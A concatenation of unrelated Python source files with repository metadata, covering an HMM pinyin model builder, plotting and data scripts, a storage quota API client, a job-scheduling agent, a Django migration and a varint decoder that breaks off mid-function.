loliveira@inf.ufsm.br
|
5260c2df4a64f3a54d8b18ae12abc281fe8a4af7
|
06d09ea58ce1cfc0501ed598dbecda4273597567
|
/HMM/process_finally.py
|
601d32af19718cde39116fa35d48b669077234a8
|
[] |
no_license
|
SunflowerAries/Pinyin-to-Character
|
0c0abdbf7cc07d902f43ad9c3b8103e887a483e2
|
363faaf1b3f3fb3addce11f2b3d4bc9af62f588f
|
refs/heads/master
| 2020-11-30T08:28:48.738699
| 2020-01-12T14:20:05
| 2020-01-12T14:20:05
| 230,356,429
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,914
|
py
|
# coding: utf-8
import json, codecs
BASE_START_FILE = 'data/base_start.json'
BASE_EMISSION_FILE = 'data/base_emission.json'
BASE_TRANSITION_FILE = 'data/base_transition.json'
ALL_STATES_FILE = 'data/all_states.txt' # 所有的字
ALL_OBSERVATIONS_FILE = 'data/all_observations.txt' # 所有的拼音
PY2HZ_FILE = 'data/pinyin2hanzi.txt'
HZ2PY_FILE = 'hanzipinyin.txt'
FIN_PY2HZ_FILE = 'data/hmm_py2hz.json'
FIN_START_FILE = 'data/hmm_start.json'
FIN_EMISSION_FILE = 'data/hmm_emission.json'
FIN_TRANSITION_FILE = 'data/hmm_transition.json'
PINYIN_NUM = 411.
HANZI_NUM = 20903.
def writejson2file(obj, filename):
    """Serialize *obj* as JSON to *filename* with sorted keys.

    BUG FIX: uses a context manager so the file handle is closed
    deterministically; the original passed a bare open() into json.dump,
    leaving the handle to the garbage collector.
    """
    with open(filename, 'w') as fout:
        json.dump(obj, fout, sort_keys=True)
def readdatafromfile(filename):
    """Load and return the JSON document stored in *filename*.

    BUG FIX: uses a context manager to close the file handle; the original
    leaked it via json.load(open(filename, 'r')).
    """
    with open(filename, 'r') as fin:
        return json.load(fin)
def gen_py2hz():
    """Parse PY2HZ_FILE ('pinyin = hanzi...' lines) and write the mapping
    to FIN_PY2HZ_FILE as JSON."""
    mapping = {}
    with codecs.open(PY2HZ_FILE, 'r', 'utf-8') as fin:
        for raw_line in fin:
            pieces = raw_line.strip().split('=')
            # Any line without exactly one '=' (including blank lines)
            # marks the input file as corrupt.
            if len(pieces) != 2:
                raise Exception('invalid format')
            pinyin = pieces[0].strip()
            hanzi = pieces[1].strip()
            if pinyin and hanzi:
                mapping[pinyin] = hanzi
    writejson2file(mapping, FIN_PY2HZ_FILE)
def gen_start():
    """Normalize raw start counts into probabilities and write FIN_START_FILE."""
    start = readdatafromfile(BASE_START_FILE)
    # Smoothing: every one of the HANZI_NUM characters contributes one unit
    # to the denominator, so unseen characters get the 'default' probability.
    total = HANZI_NUM + sum(start.values())
    for hanzi in start:
        start[hanzi] = start[hanzi] / total
    writejson2file({'default': 1.0 / total, 'data': start}, FIN_START_FILE)
def gen_emission():
    """Row-normalize emission counts and write FIN_EMISSION_FILE.

    Input shape: {'泥': {'ni': 1.0}, '了': {'liao': 1, 'le': 1}} ->
    each character's pinyin counts become probabilities summing to 1.
    """
    emission = readdatafromfile(BASE_EMISSION_FILE)
    for readings in emission.values():
        row_total = 0.
        for count in readings.values():
            row_total += count
        for pinyin in readings:
            readings[pinyin] = readings[pinyin] / row_total
    # Tiny floor probability for (hanzi, pinyin) pairs never observed.
    writejson2file({'default': 1.e-200, 'data': emission}, FIN_EMISSION_FILE)
def gen_tramsition():
    """Normalize transition counts with add-one smoothing and write
    FIN_TRANSITION_FILE.

    Input shape: {'你': {'好': 10, '们': 2}, '我': {}}.
    (Name typo kept: main() calls gen_tramsition.)
    """
    transition = readdatafromfile(BASE_TRANSITION_FILE)
    for prev_char, followers in transition.items():
        # Laplace smoothing: pretend each of the HANZI_NUM characters was
        # seen once after prev_char.
        denom = HANZI_NUM + sum(followers.values())
        for next_char in followers:
            followers[next_char] = float(followers[next_char] + 1) / denom
        followers['default'] = 1. / denom
    writejson2file({'default': 1. / HANZI_NUM, 'data': transition}, FIN_TRANSITION_FILE)
def main():
    # Regenerate every model table; the four steps are independent of each
    # other and each reads its own raw file and writes its own output.
    gen_py2hz()
    gen_start()
    gen_emission()
    gen_tramsition()
if __name__ == '__main__':
    main()
|
[
"17307130191@fudan.edu.cn"
] |
17307130191@fudan.edu.cn
|
f5a22a136e56bae2893f9a941bb1b6af17239b3a
|
17c266cef1c620d729cb8a9e3d9f47ce389c8c8f
|
/createclass.py
|
5021f3d1d2e81f759b077fa10c3f8fa9e62f953d
|
[] |
no_license
|
mubasil/flavortown
|
2cdc66492dfb46bbb78b8d42ff8a5b489db7a9a3
|
68b4ec2179782916fba0aa204255a75bba459b53
|
refs/heads/rory
| 2021-01-21T12:11:48.035094
| 2017-11-30T23:22:34
| 2017-11-30T23:22:34
| 102,047,698
| 0
| 2
| null | 2017-11-30T23:23:23
| 2017-08-31T21:39:02
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 745
|
py
|
import csv
import json
import os

# Build train.csv mapping each recipe's ingredient text to its cuisine label.
# NOTE(review): this script targets Python 2 (`unicode` builtin below).
classifiers = []
recipeClasses = ["Asian", "Mexican", "Italian"]
for recipeClass in recipeClasses:
    # One directory per cuisine, each holding JSON recipe files.
    directory = os.path.join(os.getcwd(), recipeClass)
    for filename in os.listdir(directory):
        with open(os.path.join(directory, filename)) as fileinfo:
            data = json.loads(fileinfo.read())
        # Join ingredients into one query string; the leading space on each
        # item is kept for byte-compatibility with the previous output.
        allIngredients = "".join(" " + datum for datum in data['Ingredients'])
        classifiers.append({'query': allIngredients, 'classifier': recipeClass})

# Close the output file deterministically; the original csv.writer(open(...))
# leaked the handle, risking an unflushed final block.
with open('train.csv', 'w') as outfile:
    writer = csv.writer(outfile)
    for row in classifiers:
        writer.writerow([unicode(row['query']).encode("utf-8"),
                         unicode(row['classifier']).encode("utf-8")])
|
[
"mubasil@yahoo.com"
] |
mubasil@yahoo.com
|
3678b34fa02bf2efb255c7b1a52c9d39e07c3bfb
|
b78c255d1c8b917c21bf689f5f9153d765fbe195
|
/dogpack/apps/2d/advection/rotating_unst/plotq2_unst.py
|
7daa00269f64d5c3e12163634a8895661de93be2
|
[] |
no_license
|
smoe1/ImplicitExplicit
|
8be586bed84b1a661e5fe71f5b063dcd406643fa
|
2b9a2d54110ca0f787d4252b9a8cc6d64b23b08d
|
refs/heads/master
| 2016-09-08T02:39:48.371767
| 2015-09-15T21:15:08
| 2015-09-15T21:15:08
| 41,374,555
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
#----------------------------------------------------------
def plotq2_unst(outputdir, n1, m, meqn, NumPhysElems, NumPhysNodes,
                xlow, xhigh, ylow, yhigh, time, x, y,
                tnode, qsoln, xmid, ymid, qsoln_elem):
    """Plot component m of the unstructured-grid solution and its error.

    Figure 1: pseudocolor plot of qsoln[:, m] on the triangulation (x, y, tnode).
    Figure 2: scatter of element-average values qsoln_elem[:, m] against the
    exact radial profile, sorted by distance from the rotating center; the
    relative L2 error is printed to stdout.

    NOTE(review): Python 2 syntax (print statements). Several arguments
    (outputdir, n1, NumPhysNodes, ylow, yhigh) are unused here -- presumably
    the signature is fixed by the DoGPack plotting driver; confirm.
    """
    import numpy as np
    import matplotlib.pyplot as plt
    from math import sqrt
    from math import pow
    from math import cos
    from math import sin
    from math import pi
    # --- Figure 1: pseudocolor of q(m) over the triangulated domain ---
    plt.figure(1)
    plt.clf()
    plt.gca().set_aspect('equal')
    plt.gca().set_xlim([xlow,xhigh])
    #plt.gca().set_ylim([ylow,yhigh])
    p1=plt.tripcolor(x, y, tnode, qsoln[:,m], shading='faceted', vmin=0.0, vmax=1.0)
    tmp1 = "".join(("q(",str(m+1),") at t = "))
    tmp2 = "".join((tmp1,str(time)))
    title = "".join((tmp2," [DoGPack]"))
    plt.title(title)
    plt.colorbar()
    plt.draw()
    # Center of the exact solution: it orbits (0.5, 0.5) on a circle of
    # radius 0.25 with period 1 in time.
    x0 = -0.25*cos(2.0*pi*time) + 0.50
    y0 = 0.25*sin(2.0*pi*time) + 0.50
    # Distance of each element centroid from the rotating center.
    r = np.zeros(NumPhysElems,float)
    for i in range(0,NumPhysElems):
        r[i] = sqrt(pow(xmid[i]-x0,2)+pow(ymid[i]-y0,2))
    ind = r.argsort()
    # Exact solution sampled at the element radii (qex fills column m=0 in place).
    qscat_ex = np.zeros((NumPhysElems,meqn),float)
    qex(NumPhysElems,meqn,r,qscat_ex)
    # Relative L2 error of the element averages.
    err = np.linalg.norm(qscat_ex[:,m]-qsoln_elem[:,m])/np.linalg.norm(qscat_ex[:,m])
    print ""
    print " Error = ",'{:e}'.format(err)
    print ""
    # --- Figure 2: radial scatter of computed vs exact element averages ---
    plt.figure(2)
    plt.clf()
    plt.gca().set_aspect('auto')
    plt.gca().set_xlim([0.0,0.5])
    #plt.gca().set_ylim([0.0,1.0])
    plt.plot(r[ind],qscat_ex[ind,m],'k-')
    plt.plot(r[ind],qsoln_elem[ind,m],'bo')
    tmp1 = "".join(("Scattor plot of q(",str(m+1),") at t = "))
    tmp2 = "".join((tmp1,str(time)))
    title = "".join((tmp2," [DoGPack]"))
    plt.title(title)
    plt.draw()
#----------------------------------------------------------
#----------------------------------------------------------
def qex(NumPhysElems,meqn,r,qscat_ex):
    """Fill column 0 of qscat_ex in place with the exact radial profile
    cos(2.5*pi*r)**6 wherever r < 0.2; other entries are left untouched."""
    from math import cos, pi
    cutoff = 0.2
    for idx in range(NumPhysElems):
        radius = r[idx]
        if radius < cutoff:
            qscat_ex[idx, 0] = cos(2.5 * pi * radius) ** 6
|
[
"smoe@uw.edu"
] |
smoe@uw.edu
|
94540c0cfc7509d41aeaeedc64a11096d5b2616a
|
81d955c3ac886e690ceb01026ed769b1784dbef9
|
/purity_fb/purity_fb_1dot8/apis/quotas_groups_api.py
|
665498e5f3f9ea81a3c569698b958f1cb115c367
|
[
"Apache-2.0"
] |
permissive
|
etsangsplk/purity_fb_python_client
|
bc525ef1a18f6a79c1536cb4519a7efd58d09d89
|
0807a0fa2eab273bc08f73266d9cda9fa33b37bd
|
refs/heads/master
| 2020-06-03T05:49:03.015147
| 2019-05-16T06:11:40
| 2019-05-16T06:11:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,547
|
py
|
# coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0 - 1.8), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.8
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class QuotasGroupsApi(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen

    Review refactor: the four operations on /1.8/quotas/groups duplicated
    ~90% of their bodies; the shared request plumbing now lives in
    _invoke_with_http_info, driven by a per-operation parameter list.
    Public method names, signatures (**kwargs), returns and raised
    TypeErrors are unchanged.
    """

    # Framework kwargs accepted by every operation in addition to its own.
    _FRAMEWORK_PARAMS = ('callback', '_return_http_data_only',
                         '_preload_content', '_request_timeout')

    # Query parameters serialized as comma-separated lists.
    _CSV_PARAMS = frozenset(['names', 'file_system_names', 'gids', 'group_names'])

    def __init__(self, api_client=None):
        # Use the provided client, or fall back to (and lazily create) the
        # shared client on the global Configuration singleton.
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def _invoke_with_http_info(self, method_name, http_method, op_params,
                               response_type, kwargs):
        """Shared request builder for every /1.8/quotas/groups operation.

        :param str method_name: public method name (used in error messages).
        :param str http_method: 'GET' | 'POST' | 'PATCH' | 'DELETE'.
        :param list[str] op_params: operation-specific kwargs in query order;
            'quota' (if present) becomes the request body, all others become
            query parameters.
        :param str response_type: deserialization target class name, or None.
        :param dict kwargs: the caller's keyword arguments.
        :raises TypeError: on any keyword argument the operation does not take.
        """
        allowed = set(op_params) | set(self._FRAMEWORK_PARAMS)
        for key in kwargs:
            if key not in allowed:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name)
                )

        query_params = []
        collection_formats = {}
        body_params = None
        for name in op_params:
            if name not in kwargs:
                continue
            if name == 'quota':
                body_params = kwargs[name]
            else:
                query_params.append((name, kwargs[name]))
                if name in self._CSV_PARAMS:
                    collection_formats[name] = 'csv'

        header_params = {}
        if response_type is not None:
            # Operations returning a payload negotiate a JSON response.
            header_params['Accept'] = self.api_client.\
                select_header_accept(['application/json'])
        if 'quota' in op_params:
            # Operations sending a body declare its content type.
            header_params['Content-Type'] = self.api_client.\
                select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['AuthTokenHeader']

        return self.api_client.call_api(
            '/1.8/quotas/groups', http_method,
            {},                       # no path parameters for this endpoint
            query_params,
            header_params,
            body=body_params,
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=auth_settings,
            callback=kwargs.get('callback'),
            _return_http_data_only=kwargs.get('_return_http_data_only'),
            _preload_content=kwargs.get('_preload_content', True),
            _request_timeout=kwargs.get('_request_timeout'),
            collection_formats=collection_formats)

    def create_group_quotas(self, **kwargs):
        """
        Create a new group quota

        Synchronous by default; pass a `callback` function for an
        asynchronous request (the request thread is returned instead).

        :param callback function: The callback function for asynchronous
            request. (optional)
        :param list[str] file_system_names: A comma-separated list of file
            system names.
        :param list[str] gids: A comma-separated list of group IDs. Cannot be
            provided together with group_names.
        :param list[str] group_names: A comma-separated list of group names.
            Cannot be provided together with gids.
        :param QuotasGroup quota:
        :return: QuotasGroupResponse
        """
        # NOTE: both branches of the original if/else returned the same
        # expression, so the call is unconditional here.
        kwargs['_return_http_data_only'] = True
        return self.create_group_quotas_with_http_info(**kwargs)

    def create_group_quotas_with_http_info(self, **kwargs):
        """Same as create_group_quotas, without forcing
        _return_http_data_only (so (data, status, headers) may be returned)."""
        return self._invoke_with_http_info(
            'create_group_quotas', 'POST',
            ['file_system_names', 'gids', 'group_names', 'quota'],
            'QuotasGroupResponse', kwargs)

    def delete_group_quotas(self, **kwargs):
        """
        Delete group quotas

        Synchronous by default; pass a `callback` function for an
        asynchronous request (the request thread is returned instead).

        :param callback function: The callback function for asynchronous
            request. (optional)
        :param list[str] names: A comma-separated list of resource names.
        :param list[str] file_system_names: A comma-separated list of file
            system names.
        :param list[str] gids: A comma-separated list of group IDs. Cannot be
            provided together with group_names.
        :param list[str] group_names: A comma-separated list of group names.
            Cannot be provided together with gids.
        :return: None
        """
        kwargs['_return_http_data_only'] = True
        return self.delete_group_quotas_with_http_info(**kwargs)

    def delete_group_quotas_with_http_info(self, **kwargs):
        """Same as delete_group_quotas, without forcing
        _return_http_data_only."""
        return self._invoke_with_http_info(
            'delete_group_quotas', 'DELETE',
            ['names', 'file_system_names', 'gids', 'group_names'],
            None, kwargs)

    def list_group_quotas(self, **kwargs):
        """
        A list of quota group entries

        Synchronous by default; pass a `callback` function for an
        asynchronous request (the request thread is returned instead).

        :param callback function: The callback function for asynchronous
            request. (optional)
        :param list[str] names: A comma-separated list of resource names.
        :param str filter: The filter to be used for query.
        :param int limit: limit, should be >= 0
        :param str sort: The way to order the results.
        :param int start: start
        :param str token: token
        :param list[str] file_system_names: A comma-separated list of file
            system names.
        :param list[str] gids: A comma-separated list of group IDs. Cannot be
            provided together with group_names.
        :param list[str] group_names: A comma-separated list of group names.
            Cannot be provided together with gids.
        :return: QuotasGroupResponse
        """
        kwargs['_return_http_data_only'] = True
        return self.list_group_quotas_with_http_info(**kwargs)

    def list_group_quotas_with_http_info(self, **kwargs):
        """Same as list_group_quotas, without forcing
        _return_http_data_only."""
        return self._invoke_with_http_info(
            'list_group_quotas', 'GET',
            ['names', 'filter', 'limit', 'sort', 'start', 'token',
             'file_system_names', 'gids', 'group_names'],
            'QuotasGroupResponse', kwargs)

    def update_group_quotas(self, **kwargs):
        """
        Update existing group quotas

        Synchronous by default; pass a `callback` function for an
        asynchronous request (the request thread is returned instead).

        :param callback function: The callback function for asynchronous
            request. (optional)
        :param list[str] names: A comma-separated list of resource names.
        :param list[str] file_system_names: A comma-separated list of file
            system names.
        :param list[str] gids: A comma-separated list of group IDs. Cannot be
            provided together with group_names.
        :param list[str] group_names: A comma-separated list of group names.
            Cannot be provided together with gids.
        :param QuotasGroup quota:
        :return: QuotasGroupResponse
        """
        kwargs['_return_http_data_only'] = True
        return self.update_group_quotas_with_http_info(**kwargs)

    def update_group_quotas_with_http_info(self, **kwargs):
        """Same as update_group_quotas, without forcing
        _return_http_data_only."""
        return self._invoke_with_http_info(
            'update_group_quotas', 'PATCH',
            ['names', 'file_system_names', 'gids', 'group_names', 'quota'],
            'QuotasGroupResponse', kwargs)
|
[
"azaria.zornberg@purestorage.com"
] |
azaria.zornberg@purestorage.com
|
9eedcc25d03a6a9bc42984a3f718564309407905
|
48b50c0b525956fa2267b00021d52ca5ef715e81
|
/02-notifon/scale-up.py
|
061c708974183ea6f322a4a2c16cd5a2363eb13f
|
[] |
no_license
|
cashpole/automating-aws-with-python
|
2bcdb97fa4d7768a1a4ac581b16935262a20b27c
|
fb6bcf6da93f80fbd11944be080e7a34da993f3d
|
refs/heads/master
| 2022-12-08T20:09:59.514534
| 2019-07-01T19:18:07
| 2019-07-01T19:18:07
| 186,532,329
| 0
| 0
| null | 2022-09-08T08:22:31
| 2019-05-14T02:47:02
|
Python
|
UTF-8
|
Python
| false
| false
| 224
|
py
|
# coding: utf-8
# Fire the 'Scale Up' scaling policy on the Notifon example Auto Scaling group.
import boto3

# Credentials come from the named local AWS profile, not the environment.
aws_session = boto3.Session(profile_name='pythonAutomation')
scaling = aws_session.client('autoscaling')
scaling.execute_policy(AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Up')
|
[
"cashpole@hotmail.com"
] |
cashpole@hotmail.com
|
086aebcfe4c9dc2fee2d104a55ae67c41c0a5a78
|
a9c9316fe425dac911ca6b3e33d2c76c48e428b3
|
/maro/cli/process/agent/job_agent.py
|
9949099a4a06c3dc64c4c01c928c20c7d4ebcf1d
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
00mjk/maro
|
a64601d5c43a7e6808b1cab1c19be15595395ce1
|
05a64a67fee7d2c4198a57593c464d64e0a8ce7f
|
refs/heads/master
| 2023-03-11T16:58:54.043497
| 2021-02-10T15:31:58
| 2021-02-10T15:31:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,593
|
py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import multiprocessing as mp
import os
import subprocess
import time
import psutil
import redis
from maro.cli.process.utils.details import close_by_pid, get_child_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
class PendingJobAgent(mp.Process):
    """Daemon process that drains the pending-job ticket list.

    Each polling cycle it reads every queued ticket and, while the number of
    running jobs is below the configured parallel level, launches the job's
    component commands and records their PIDs under the running-job hash.
    """
    def __init__(self, redis_connection, check_interval: int = 60):
        # redis_connection: shared client for the process-mode Redis store.
        # check_interval: seconds to sleep between polling cycles.
        super().__init__()
        self.redis_connection = redis_connection
        self.check_interval = check_interval
    def run(self):
        # Poll forever; this process is only stopped by being killed
        # externally (see JobTrackingAgent._close_agents).
        while True:
            self._check_pending_ticket()
            time.sleep(self.check_interval)
    def _check_pending_ticket(self):
        # Check pending job ticket
        pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
        for job_name in pending_jobs:
            job_detail = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, job_name))
            running_jobs_length = self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB)
            parallel_level = self.redis_connection.hget(ProcessRedisName.SETTING, "parallel_level")
            # Start pending job only if current running job's number less than parallel level.
            if int(parallel_level) > running_jobs_length:
                self._start_job(job_detail)
                self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
    def _start_job(self, job_details: dict):
        # Launch every component command of the job — one subprocess per
        # replica — with stdout redirected to a per-component log file.
        command_pid_list = []
        for component_type, command_info in job_details["components"].items():
            component_number = command_info["num"]
            component_command = f"JOB_NAME={job_details['name']} " + command_info["command"]
            for number in range(component_number):
                job_local_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_details['name']}")
                if not os.path.exists(job_local_path):
                    os.makedirs(job_local_path)
                with open(f"{job_local_path}/{component_type}_{number}.log", "w") as log_file:
                    proc = subprocess.Popen(component_command, shell=True, stdout=log_file)
                    # shell=True makes the shell the direct child; record the
                    # PID of the actual command underneath it.
                    command_pid = get_child_pid(proc.pid)
                    command_pid_list.append(command_pid)
        self.redis_connection.hset(ProcessRedisName.RUNNING_JOB, job_details["name"], json.dumps(command_pid_list))
class JobTrackingAgent(mp.Process):
    """Daemon that clears finished jobs from the running table and, when idle
    for `_countdown` consecutive checks (and keep-alive is off), shuts the
    whole agent tree down."""
    def __init__(self, redis_connection, check_interval: int = 60):
        # redis_connection: shared client for the process-mode Redis store.
        # check_interval: seconds to sleep between polling cycles.
        super().__init__()
        self.redis_connection = redis_connection
        self.check_interval = check_interval
        self._shutdown_count = 0
        # BUG FIX: hget returns bytes (or str), and the original stored it
        # raw, making the `>=` comparison in _close_agents raise TypeError
        # under Python 3. Cast to int once, here.
        self._countdown = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_countdown"))
    def run(self):
        # Poll forever; the exit path is _close_agents killing this process.
        while True:
            self._check_job_status()
            time.sleep(self.check_interval)
            keep_alive = int(self.redis_connection.hget(ProcessRedisName.SETTING, "keep_agent_alive"))
            if not keep_alive:
                self._close_agents()
    def _check_job_status(self):
        # Drop running-job entries whose recorded PIDs have all exited.
        running_jobs = self.redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
        running_jobs = {job_name.decode(): json.loads(pid_list) for job_name, pid_list in running_jobs.items()}
        for running_job, pid_list in running_jobs.items():
            # A job counts as alive while any one of its component PIDs exists.
            still_alive = False
            for pid in pid_list:
                if psutil.pid_exists(pid):
                    still_alive = True
            # Update if no pid exists
            if not still_alive:
                self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, running_job)
    def _close_agents(self):
        # Count consecutive checks with no running jobs and no pending
        # tickets; any activity resets the counter.
        if (
            not self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB) and
            not self.redis_connection.llen(ProcessRedisName.PENDING_JOB_TICKETS)
        ):
            self._shutdown_count += 1
        else:
            self._shutdown_count = 0
        if self._shutdown_count >= self._countdown:
            agent_pid = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
            # Kill the master agent's whole process tree (including us).
            close_by_pid(pid=agent_pid, recursive=True)
            # Set agent status to 0 (stopped) for observers.
            self.redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
class KilledJobAgent(mp.Process):
    """Daemon that consumes kill tickets: terminates running jobs or
    withdraws still-pending ones, then clears each ticket."""
    def __init__(self, redis_connection, check_interval: int = 60):
        # redis_connection: shared client for the process-mode Redis store.
        # check_interval: seconds to sleep between polling cycles.
        super().__init__()
        self.redis_connection = redis_connection
        self.check_interval = check_interval
    def run(self):
        """Process kill tickets forever at a fixed polling interval."""
        while True:
            self._check_kill_ticket()
            time.sleep(self.check_interval)
    def _check_kill_ticket(self):
        """Handle every queued kill ticket once."""
        for ticket in self.redis_connection.lrange(ProcessRedisName.KILLED_JOB_TICKETS, 0, -1):
            if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, ticket):
                # Job already started: kill its recorded component PIDs and
                # remove it from the running table.
                pids = json.loads(self.redis_connection.hget(ProcessRedisName.RUNNING_JOB, ticket))
                close_by_pid(pid=pids, recursive=False)
                self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, ticket)
            else:
                # Job never started: just withdraw its pending ticket.
                self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, ticket)
            self.redis_connection.lrem(ProcessRedisName.KILLED_JOB_TICKETS, 0, ticket)
class MasterAgent:
    """Bootstraps the Redis connection and launches all worker agents."""

    def __init__(self):
        setting_info = load_setting_info()
        self.check_interval = setting_info["check_interval"]
        self.redis_connection = redis.Redis(
            host=setting_info["redis_info"]["host"],
            port=setting_info["redis_info"]["port"]
        )
        # Record our PID so JobTrackingAgent can shut the agent down later.
        self.redis_connection.hset(ProcessRedisName.SETTING, "agent_pid", os.getpid())

    def start(self) -> None:
        """Start agents."""
        # All three agents share one Redis connection and poll on the same cadence.
        for agent_class in (PendingJobAgent, KilledJobAgent, JobTrackingAgent):
            worker = agent_class(
                redis_connection=self.redis_connection,
                check_interval=self.check_interval
            )
            worker.start()
if __name__ == "__main__":
    # Entry point: construct the master agent and spawn the worker agents.
    master_agent = MasterAgent()
    master_agent.start()
|
[
"noreply@github.com"
] |
noreply@github.com
|
76401ac4e722d051809095cd5b95aa29888ec01d
|
8485ac621de45db5db3a1faf248690650d951258
|
/tracker.py
|
d39f4122960155450e4719a98a2d22a93bca568b
|
[] |
no_license
|
gerardo8al/portfolio_tracker
|
610e538dfc315c870a6838d8ea68bf3766e8b838
|
5c27e71c00f1d729484afd6b8366b069c98246a4
|
refs/heads/master
| 2020-03-12T17:30:26.253308
| 2018-04-24T20:21:00
| 2018-04-24T20:21:00
| 130,737,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 700
|
py
|
from constants import *
import csv
import urllib.request
import json
def send_get_request(url):
    """Issue an HTTP GET to *url* and return the response body parsed as JSON.

    Args:
        url: Address to fetch; the response body must be UTF-8 encoded JSON.

    Returns:
        The deserialized JSON payload (dict, list, etc.).
    """
    # Use a context manager so the connection is closed even on error
    # (the original leaked the response object).
    with urllib.request.urlopen(url) as response:
        return json.loads(response.read().decode('utf-8'))
def json_pretty_print(parsed):
    """Pretty-print *parsed* as indented JSON with keys in sorted order."""
    rendered = json.dumps(parsed, sort_keys=True, indent=4)
    print(rendered)
def main():
    """Fetch current exchange data and walk the portfolio CSV."""
    # One request returns the quote info for every ticker on the exchange.
    json_back = send_get_request(URL)
    with open(CSV, 'rt') as portfolio_file:
        for row in csv.reader(portfolio_file):
            ticker = row[0]
            quantity = row[1]
if __name__ == "__main__":
    # Run the tracker only when executed as a script.
    main()
|
[
"gerardo8a@gmail.com"
] |
gerardo8a@gmail.com
|
b0514a0533d844c12afb5368772ef5d43d163ea9
|
490ac0cbeb1436a642d236381b277b07a86aff2a
|
/blog/migrations/0001_initial.py
|
19f8b37b13b8007b355b1319c3edd370ddfaf805
|
[] |
no_license
|
Marshall210/My_site
|
8f445ce073d75a6b3675c7876288ef6627b3859d
|
8130394070c382af510e2912772b0c9e830e619c
|
refs/heads/master
| 2020-07-21T11:08:50.900237
| 2019-09-22T14:12:17
| 2019-09-22T14:12:17
| 206,843,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
# Generated by Django 2.2.5 on 2019-09-20 18:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial migration: creates the blog `Post` table.

    Auto-generated by Django (see header); edit with care.
    """
    initial = True
    dependencies = [
        # Posts reference the configured user model via the `author` FK.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"tymchenko99978@gmail.com"
] |
tymchenko99978@gmail.com
|
6b585b2fcc4e1b39e9ed6dbd006f975bf82030b4
|
0fe88e2bcf3015f6b54508b2304e9833bc7f7eb2
|
/skadi/index/__init__.py
|
df5fab35467894641108704a015acd8e8ae77318
|
[
"MIT"
] |
permissive
|
gwvent/skadi
|
3d73ba6efbc32065599d2e0773f4783342cf5482
|
0b5c983a0a17e57d70fb64b2401caba40d43679a
|
refs/heads/master
| 2021-01-17T22:54:38.196692
| 2013-08-20T08:04:25
| 2013-08-20T08:04:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,355
|
py
|
import math
# Varint decoding limits: at most 35 payload bits, 7 bits per byte.
VI_BIT_MAX = 35
VI_SHIFT = 7
VI_MAX_BYTES = int(math.ceil(float(VI_BIT_MAX) / VI_SHIFT))
VI_MASK = (1 << 32) - 1


class InvalidVarint(Exception):
    """Raised when a varint's continuation bits exceed VI_BIT_MAX bits."""
    pass


# Algorithm "borrowed" from Google protobuf library.
def peek_varint(stream):
    """Decode a varint from *stream* without consuming any bytes.

    Args:
        stream: A buffered reader supporting ``peek()``.

    Returns:
        (value, size): the decoded unsigned value masked to 32 bits, and the
        number of bytes the varint occupies.

    Raises:
        EOFError: the peeked buffer ended mid-varint.
        InvalidVarint: more than VI_BIT_MAX bits of varint data were seen.
    """
    peeked = stream.peek(VI_MAX_BYTES)
    size, value, shift = 0, 0, 0
    while True:
        if size >= len(peeked):
            raise EOFError()
        # BUG FIX: on Python 3, indexing bytes yields an int and ord(int)
        # raises TypeError; accept both bytes (py3) and str (py2) buffers.
        byte = peeked[size]
        if not isinstance(byte, int):
            byte = ord(byte)
        size += 1
        value |= ((byte & 0x7f) << shift)
        shift += VI_SHIFT
        if not (byte & 0x80):
